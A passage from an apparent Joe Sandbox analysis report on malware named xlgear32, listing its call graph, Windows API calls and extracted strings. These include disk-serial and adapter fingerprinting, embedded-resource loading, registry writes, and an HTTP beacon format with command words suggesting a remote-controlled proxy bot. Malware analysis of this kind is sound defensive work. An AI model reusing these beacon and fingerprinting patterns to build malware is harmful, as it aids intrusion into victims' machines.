calls 61702->61703 61707 2d91db6 61703->61707 61705 2da0b10 Mailbox 68 API calls 61704->61705 61708 2d91d3c 
61705->61708 61709 2da0b10 Mailbox 68 API calls 61706->61709 61710 2d91e0d 61707->61710 61711 2d91dc6 GetLastError 61707->61711 61712 2d91712 60 API calls 61708->61712 61713 2d91d84 61709->61713 61714 2d91e1d 61710->61714 61715 2d91e11 WaitForSingleObject CloseHandle 61710->61715 61716 2d91dd8 61711->61716 61717 2d91d4e 61712->61717 61718 2d91712 60 API calls 61713->61718 61714->61693 61715->61714 61719 2d91ddc CloseHandle 61716->61719 61720 2d91ddf 61716->61720 61717->61700 61718->61702 61719->61720 61721 2d91de9 CloseHandle 61720->61721 61722 2d91dee 61720->61722 61721->61722 61723 2da0b10 Mailbox 68 API calls 61722->61723 61724 2d91dfb 61723->61724 61725 2d91712 60 API calls 61724->61725 61725->61710 61727 2d9171c __EH_prolog 61726->61727 61728 2d9173e 61727->61728 61733 2d91815 59 API calls std::exception::exception 61727->61733 61728->61687 61730 2d91732 61734 2d9a4a2 60 API calls 2 library calls 61730->61734 61732->61685 61733->61730 61746 2d930ae WSASetLastError 61735->61746 61738 2d930ae 71 API calls 61739 2d93c90 61738->61739 61740 2d916ae 61739->61740 61741 2d916b8 __EH_prolog 61740->61741 61742 2d91701 61741->61742 61762 2da24d3 59 API calls std::exception::_Copy_str 61741->61762 61742->61344 61744 2d916dc 61763 2d9a4a2 60 API calls 2 library calls 61744->61763 61747 2d930ec WSAStringToAddressA 61746->61747 61748 2d930ce 61746->61748 61750 2d9a509 69 API calls 61747->61750 61748->61747 61749 2d930d3 61748->61749 61751 2da0b10 Mailbox 68 API calls 61749->61751 61752 2d93114 61750->61752 61761 2d930d8 61751->61761 61753 2d93154 61752->61753 61759 2d9311e _memcmp 61752->61759 61754 2d93135 61753->61754 61756 2da0b10 Mailbox 68 API calls 61753->61756 61755 2d93193 61754->61755 61757 2da0b10 Mailbox 68 API calls 61754->61757 61760 2da0b10 Mailbox 68 API calls 61755->61760 61755->61761 61756->61754 61757->61755 61758 2da0b10 Mailbox 68 API calls 61758->61754 61759->61754 61759->61758 61760->61761 61761->61738 61761->61739 61762->61744 61764->61349 61765->61350 
61787 2d9353e 61766->61787 61770 2d92ae8 WSASetLastError connect 61769->61770 61771 2d92ad8 61769->61771 61773 2d9a509 69 API calls 61770->61773 61772 2da0b10 Mailbox 68 API calls 61771->61772 61774 2d92add 61772->61774 61775 2d92b07 61773->61775 61776 2da0b10 Mailbox 68 API calls 61774->61776 61775->61774 61777 2da0b10 Mailbox 68 API calls 61775->61777 61778 2d92b1b 61776->61778 61777->61774 61779 2da0b10 Mailbox 68 API calls 61778->61779 61781 2d92b38 61778->61781 61779->61781 61786 2d92b87 61781->61786 61838 2d93027 71 API calls Mailbox 61781->61838 61782 2d92b59 61782->61786 61839 2d92fb4 71 API calls Mailbox 61782->61839 61784 2d92b7a 61785 2da0b10 Mailbox 68 API calls 61784->61785 61784->61786 61785->61786 61786->61356 61788 2d93548 __EH_prolog 61787->61788 61789 2d93557 61788->61789 61790 2d93576 61788->61790 61817 2d91996 68 API calls __cinit 61789->61817 61809 2d92edd WSASetLastError WSASocketA 61790->61809 61793 2d9355f 61793->61352 61795 2d935ad CreateIoCompletionPort 61796 2d935db 61795->61796 61797 2d935c5 GetLastError 61795->61797 61799 2da0b10 Mailbox 68 API calls 61796->61799 61798 2da0b10 Mailbox 68 API calls 61797->61798 61800 2d935d2 61798->61800 61799->61800 61801 2d935ef 61800->61801 61802 2d93626 61800->61802 61803 2da0b10 Mailbox 68 API calls 61801->61803 61836 2d9def3 60 API calls 2 library calls 61802->61836 61804 2d93608 61803->61804 61818 2d929ee 61804->61818 61807 2d93659 61808 2da0b10 Mailbox 68 API calls 61807->61808 61808->61793 61810 2da0b10 Mailbox 68 API calls 61809->61810 61811 2d92f0a WSAGetLastError 61810->61811 61812 2d92f21 61811->61812 61816 2d92f41 61811->61816 61813 2d92f3c 61812->61813 61814 2d92f27 setsockopt 61812->61814 61815 2da0b10 Mailbox 68 API calls 61813->61815 61814->61813 61815->61816 61816->61793 61816->61795 61817->61793 61820 2d92a0c 61818->61820 61835 2d92aad 61818->61835 61819 2d92a39 WSASetLastError closesocket 61822 2d9a509 69 API calls 61819->61822 61820->61819 61825 2da0b10 Mailbox 68 API calls 
61820->61825 61821 2da0b10 Mailbox 68 API calls 61823 2d92ab8 61821->61823 61824 2d92a51 61822->61824 61823->61793 61827 2da0b10 Mailbox 68 API calls 61824->61827 61824->61835 61826 2d92a21 61825->61826 61837 2d92f50 71 API calls Mailbox 61826->61837 61829 2d92a5c 61827->61829 61831 2d92a7b ioctlsocket WSASetLastError closesocket 61829->61831 61832 2da0b10 Mailbox 68 API calls 61829->61832 61830 2d92a36 61830->61819 61834 2d9a509 69 API calls 61831->61834 61833 2d92a6e 61832->61833 61833->61831 61833->61835 61834->61835 61835->61821 61835->61823 61836->61807 61837->61830 61838->61782 61839->61784 61841 2d92dca 61840->61841 61842 2d92de4 61840->61842 61843 2da0b10 Mailbox 68 API calls 61841->61843 61844 2d92dfc 61842->61844 61846 2d92def 61842->61846 61845 2d92dcf 61843->61845 61854 2d92d39 WSASetLastError WSASend 61844->61854 61845->61360 61848 2da0b10 Mailbox 68 API calls 61846->61848 61848->61845 61849 2d92e0c 61849->61845 61850 2d92e54 WSASetLastError select 61849->61850 61852 2da0b10 68 API calls Mailbox 61849->61852 61853 2d92d39 71 API calls 61849->61853 61851 2d9a509 69 API calls 61850->61851 61851->61849 61852->61849 61853->61849 61855 2d9a509 69 API calls 61854->61855 61856 2d92d6e 61855->61856 61857 2d92d75 61856->61857 61860 2d92d82 61856->61860 61858 2da0b10 Mailbox 68 API calls 61857->61858 61859 2d92d7a 61858->61859 61862 2d92d9c 61859->61862 61863 2da0b10 Mailbox 68 API calls 61859->61863 61860->61859 61861 2da0b10 Mailbox 68 API calls 61860->61861 61861->61859 61862->61849 61863->61862 61864->61376 61865 402cf3 61866 40da23 CreateDirectoryA 61865->61866 61867 402c74 CopyFileA 61868 2dda6ea 61869 2de4d1b CreateFileA 61868->61869 61871 40d239 RegSetValueExA 61872 40d7e3 RegCloseKey 61871->61872 61873 40d866 SetEvent 61872->61873 61874 40d8f7 61873->61874 61874->61874 61875 2dcfd26 61879 2dd3769 61875->61879 61882 2de5e00 61875->61882 61880 2df4659 WriteFile 61879->61880 61881 2e2697c 61880->61881 61883 2e1d337 CreateFileA 61882->61883 61884 402c3b 
61887 401f64 FindResourceA 61884->61887 61886 402c40 61888 401f86 GetLastError SizeofResource 61887->61888 61889 401f9f 61887->61889 61888->61889 61890 401fa6 LoadResource LockResource GlobalAlloc 61888->61890 61889->61886 61891 401fd2 61890->61891 61892 401ffb GetTickCount 61891->61892 61894 402005 GlobalAlloc 61892->61894 61894->61889 61895 2d9f9a7 LoadLibraryA 61896 2d9fa8a 61895->61896 61897 2d9f9d0 GetProcAddress 61895->61897 61898 2d9fa83 FreeLibrary 61897->61898 61900 2d9f9e4 61897->61900 61898->61896 61899 2d9f9f6 GetAdaptersInfo 61899->61900 61900->61899 61901 2d9fa7e 61900->61901 61902 2da3b4c _Allocate 60 API calls 61900->61902 61901->61898 61902->61900

                                                                          Control-flow Graph
                                                                          APIs
                                                                          • Sleep.KERNEL32(0000EA60), ref: 02D96708
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D96713
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D96724
                                                                          • InternetOpenA.WININET(?), ref: 02D972B5
                                                                          • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02D972DD
                                                                          • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02D972F5
                                                                          • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02D9730D
                                                                          • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02D97336
                                                                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02D97358
                                                                          • InternetCloseHandle.WININET(00000000), ref: 02D97378
                                                                          • InternetCloseHandle.WININET(00000000), ref: 02D97383
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D973EE
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D973FF
                                                                          • _malloc.LIBCMT ref: 02D97498
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D974AA
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D974B6
                                                                          • _malloc.LIBCMT ref: 02D9758E
                                                                          • _strtok.LIBCMT ref: 02D975BF
                                                                          • _swscanf.LIBCMT ref: 02D975D6
                                                                          • _strtok.LIBCMT ref: 02D975ED
                                                                          • _free.LIBCMT ref: 02D975F9
                                                                          • Sleep.KERNEL32(000007D0), ref: 02D976F1
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D97772
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D97784
                                                                          • _sprintf.LIBCMT ref: 02D97822
                                                                          • RtlEnterCriticalSection.NTDLL(00000020), ref: 02D978E6
                                                                          • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D9791A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                                          • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                                          • API String ID: 1657546717-1839899575
                                                                          • Opcode ID: c1d8671c50ecf8cda47ab4f56595588e0a79eb9e43d69a87f38b776da53210f7
                                                                          • Instruction ID: af2549c2d1dd84fed8cdfcc338385b2491a3a62c66b5ccd3a62ae88c320bad81
                                                                          • Opcode Fuzzy Hash: c1d8671c50ecf8cda47ab4f56595588e0a79eb9e43d69a87f38b776da53210f7
                                                                          • Instruction Fuzzy Hash: 0C32E172648381DFEB25AB24D814BEBB7E6EF85314F10081DF58A97391EB719D04CB62

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • RtlInitializeCriticalSection.NTDLL(02DC71E0), ref: 02D964BA
                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D964D1
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02D964DA
                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D964E9
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02D964EC
                                                                          • GetTickCount.KERNEL32 ref: 02D964F8
                                                                            • Part of subcall function 02D9605A: _malloc.LIBCMT ref: 02D96068
                                                                          • GetVersionExA.KERNEL32(02DC7038), ref: 02D96525
                                                                          • _malloc.LIBCMT ref: 02D96551
                                                                            • Part of subcall function 02DA2FAC: __FF_MSGBANNER.LIBCMT ref: 02DA2FC3
                                                                            • Part of subcall function 02DA2FAC: __NMSG_WRITE.LIBCMT ref: 02DA2FCA
                                                                            • Part of subcall function 02DA2FAC: RtlAllocateHeap.NTDLL(00810000,00000000,00000001), ref: 02DA2FEF
                                                                          • _malloc.LIBCMT ref: 02D96561
                                                                          • _malloc.LIBCMT ref: 02D9656C
                                                                          • _malloc.LIBCMT ref: 02D96577
                                                                          • _malloc.LIBCMT ref: 02D96582
                                                                          • _malloc.LIBCMT ref: 02D9658D
                                                                          • _malloc.LIBCMT ref: 02D96598
                                                                          • _malloc.LIBCMT ref: 02D965A7
                                                                          • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D965BE
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02D965C7
                                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D965D6
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02D965D9
                                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D965E4
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02D965E7
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D96621
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D9662E
                                                                          • _malloc.LIBCMT ref: 02D96652
                                                                          • _malloc.LIBCMT ref: 02D96660
                                                                          • _malloc.LIBCMT ref: 02D96667
                                                                          • _malloc.LIBCMT ref: 02D9668D
                                                                          • QueryPerformanceCounter.KERNEL32(00000200), ref: 02D966A0
                                                                          • Sleep.KERNEL32 ref: 02D966AE
                                                                          • _malloc.LIBCMT ref: 02D966BA
                                                                          • _malloc.LIBCMT ref: 02D966C7
                                                                          • Sleep.KERNEL32(0000EA60), ref: 02D96708
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D96713
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D96724
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _malloc$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                          • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat$xq_
                                                                          • API String ID: 4273019447-905009876
                                                                          • Opcode ID: f92b4263aaad7e08b5a315cb86422506ec235a049f441b1d0244e1b5d156ad87
                                                                          • Instruction ID: f732d5fb16db0a56f6fd9cbcef46b3cdc918ef11a95a1daef6912ef3b34237ad
                                                                          • Opcode Fuzzy Hash: f92b4263aaad7e08b5a315cb86422506ec235a049f441b1d0244e1b5d156ad87
                                                                          • Instruction Fuzzy Hash: 5E715CB1D48340EBE7116F75AC59B5BBBE9EF85710F20081AF98597380DBB49C108FA6

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00401B5D
                                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                          • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                          • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                          • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                          • API String ID: 514930453-3667123677
                                                                          • Opcode ID: a648eded5dba78bf16f4a137e2c2b6b7b052dc293c02733a72e5b458839b5e0e
                                                                          • Instruction ID: a9f54c968f2091474e8feb0d981771773be25d9c6ef5ebc30493122ab1168d3f
                                                                          • Opcode Fuzzy Hash: a648eded5dba78bf16f4a137e2c2b6b7b052dc293c02733a72e5b458839b5e0e
                                                                          • Instruction Fuzzy Hash: E821B870904209AEDF219F65C9447EF7FB8EF45345F0440BAE604B62A1E7389A85CB69

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02D9F9BD
                                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02D9F9D6
                                                                          • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02D9F9FB
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 02D9FA84
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                          • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                          • API String ID: 514930453-3114217049
                                                                          • Opcode ID: 41cb72c9a5335f2badd0c7b38bbc50e6a35b124e57616e4b429776b07d7d965b
                                                                          • Instruction ID: 641169a3771fd22b480071a84474461ace3541eb50fe987fbb1204f07bac31eb
                                                                          • Opcode Fuzzy Hash: 41cb72c9a5335f2badd0c7b38bbc50e6a35b124e57616e4b429776b07d7d965b
                                                                          • Instruction Fuzzy Hash: 9221B471E08209EFDF11DBA8D890AEEBBB9EF09314F1440AAE545E7751D7708E45CBA0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02D9F8C2
                                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02D9F900
                                                                          • GetLastError.KERNEL32 ref: 02D9F961
                                                                          • CloseHandle.KERNEL32(?), ref: 02D9F998
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                          • String ID: \\.\PhysicalDrive0
                                                                          • API String ID: 4026078076-1180397377
                                                                          • Opcode ID: 3c91021e8f97879c0222271b8fc6b180d3b81d1c70001ce82605aa5b9d5715d1
                                                                          • Instruction ID: f1378f0f6540067adfe758d2f5ceefe4979ca4eb15a371eccbbe33b859f3f233
                                                                          • Opcode Fuzzy Hash: 3c91021e8f97879c0222271b8fc6b180d3b81d1c70001ce82605aa5b9d5715d1
                                                                          • Instruction Fuzzy Hash: 89317872E0022AFFDF24DF99D894AAEBBB9EB45714F20416AF515A7780D7705E00CB90

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                          • DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                          • GetLastError.KERNEL32 ref: 00401B0E
                                                                          • CloseHandle.KERNEL32(?), ref: 00401B3D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                          • String ID: \\.\PhysicalDrive0
                                                                          • API String ID: 4026078076-1180397377
                                                                          • Opcode ID: 5b2aa4f6f1db506efa266d4c362af4cf52cfeed2701d30c33ae5bfe5944f1550
                                                                          • Instruction ID: ae54cd8959710a424601ffd4623f532e2396a469a493930b182490efebea7a61
                                                                          • Opcode Fuzzy Hash: 5b2aa4f6f1db506efa266d4c362af4cf52cfeed2701d30c33ae5bfe5944f1550
                                                                          • Instruction Fuzzy Hash: 50318D71D01118EECB21EF95CD809EFBBB8EF45750F20807AE514B22A0E7785E45CB98

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D91D11
                                                                          • GetLastError.KERNEL32 ref: 02D91D23
                                                                            • Part of subcall function 02D91712: __EH_prolog.LIBCMT ref: 02D91717
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D91D59
                                                                          • GetLastError.KERNEL32 ref: 02D91D6B
                                                                          • __beginthreadex.LIBCMT ref: 02D91DB1
                                                                          • GetLastError.KERNEL32 ref: 02D91DC6
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02D91DDD
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02D91DEC
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D91E14
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02D91E1B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                          • String ID: thread$thread.entry_event$thread.exit_event
                                                                          • API String ID: 831262434-3017686385
                                                                          • Opcode ID: b83257a436d458c41eb07b9da13256ba28461cdefb171d1313db7cac6ddf6b72
                                                                          • Instruction ID: 216189fc85da463c49b6ea3c69ac2f0e785021b41a215e8f1eabaeb0cf984ff0
                                                                          • Opcode Fuzzy Hash: b83257a436d458c41eb07b9da13256ba28461cdefb171d1313db7cac6ddf6b72
                                                                          • Instruction Fuzzy Hash: C3316C71A04302DFEB01EF24C858B2BBBA5FB84754F10496AF95997390DB70DC49CBA2

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02D94D8B
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D94DB7
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D94DC3
                                                                            • Part of subcall function 02D94BED: __EH_prolog.LIBCMT ref: 02D94BF2
                                                                            • Part of subcall function 02D94BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02D94CF2
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D94E93
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D94E99
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D94EA0
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D94EA6
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D950A7
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D950AD
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D950B8
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D950C1
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                          • String ID:
                                                                          • API String ID: 2062355503-0
                                                                          • Opcode ID: e73c6147829c4724a245864c797c67d514ec4809fb5ae869017ddbe0fd8e2f10
                                                                          • Instruction ID: 3a27fb7e1080228b0a63d80fa705a7e5f905b0de4d9dcabead9ac70540aad656
                                                                          • Opcode Fuzzy Hash: e73c6147829c4724a245864c797c67d514ec4809fb5ae869017ddbe0fd8e2f10
                                                                          • Instruction Fuzzy Hash: 23B13871D0025AEFEF21DF90D854BEEBBB9AF04314F20415AE405A6381DB755E49CFA1

                                                                          Control-flow Graph (rendered graph not reproduced; summary recovered from its edge list, basic blocks 401f64-40209a): FindResourceA at 401f64; GetLastError and SizeofResource at 401f86; LoadResource, LockResource, GlobalAlloc and two calls to 402d60 at 401fa6-401fec; a tight self-looping block at 401fee-401ff9; GetTickCount at 401ffb; further loops across 402005-402051; GlobalAlloc and a call to 401c26 at 402053-402083; function exit at 402096-40209a.

                                                                          APIs
                                                                          • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A (lpType 0000000A = RT_RCDATA, an embedded raw-data resource)
                                                                          • GetLastError.KERNEL32 ref: 00401F86
                                                                          • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                          • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                          • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                          • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF (uFlags 00000040 = GPTR, fixed zero-initialised memory)
                                                                          • GetTickCount.KERNEL32 ref: 00401FFB
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                          • String ID:
                                                                          • API String ID: 564119183-0
                                                                          • Opcode ID: 4b406982c55cd146a53e35bcfe0d224a47769fdd51ac53a5645699cce47c5184
                                                                          • Instruction ID: b01298f5e92dfabffd3260d40ec81ee59ee3d80feb476c4020a7475af27d6630
                                                                          • Opcode Fuzzy Hash: 4b406982c55cd146a53e35bcfe0d224a47769fdd51ac53a5645699cce47c5184
                                                                          • Instruction Fuzzy Hash: 60315C32900255EFDB105FB89F8896F7B68EF45344B10807AFA86F7281DA748941C7A8

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02D92706
                                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D9272B (bManualReset = 0: auto-reset timer)
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02DB5B53), ref: 02D92738
                                                                            • Part of subcall function 02D91712: __EH_prolog.LIBCMT ref: 02D91717
                                                                          • SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 02D92778 (lPeriod 000493E0 = 300000 ms, so the timer re-fires every 5 minutes)
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02D927D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                          • String ID: timer
                                                                          • API String ID: 4293676635-1792073242
                                                                          • Opcode ID: f7777da8583d24cf075b97062341c3a9e3e2d175e81bf62424d2f219b02f291e
                                                                          • Instruction ID: 135a46d2e2adb10dc506c2d95dad5b570e9a7c59a985b3158a9a8154062a7c8a
                                                                          • Opcode Fuzzy Hash: f7777da8583d24cf075b97062341c3a9e3e2d175e81bf62424d2f219b02f291e
                                                                          • Instruction Fuzzy Hash: C0318BB2904706EFD711DF25D948B66BBE8FB48B24F004A2AF85592780D770DC00CBA5

                                                                          Control-flow Graph (rendered graph not reproduced; summary recovered from its edge list, basic blocks 2d92b95-2d92d38): WSASetLastError, WSARecv and a call to 2d9a509 at 2d92be2-2d92c11; WSASetLastError, select and a call to 2d9a509 at 2d92cbc-2d92cfa; the block at 2d92d19-2d92d1d loops back to the WSARecv block; calls to 2da0b10 and 2d9166f between them, and a call to 2d91996 at 2d92d22 on the way to the exit at 2d92d30-2d92d38.

                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 02D92BE4
                                                                          • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02D92C07
                                                                            • Part of subcall function 02D9A509: WSAGetLastError.WS2_32(00000000,?,?,02D92A51), ref: 02D9A517
                                                                          • WSASetLastError.WS2_32 ref: 02D92CD3
                                                                          • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02D92CE7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Recvselect
                                                                          • String ID: 3' (likely the immediate 0x2733 = 10035 = WSAEWOULDBLOCK, the error a non-blocking WSARecv returns before select is consulted, picked up as a two-byte string)
                                                                          • API String ID: 886190287-280543908
                                                                          • Opcode ID: 4b91a659ce8b681acfa07e5998fb3c7f600134c37f5432455a39f42c1948286f
                                                                          • Instruction ID: 20e844c12755c53465285fc06ddadd6f20162cd0be3e28701a919cecda080c5b
                                                                          • Opcode Fuzzy Hash: 4b91a659ce8b681acfa07e5998fb3c7f600134c37f5432455a39f42c1948286f
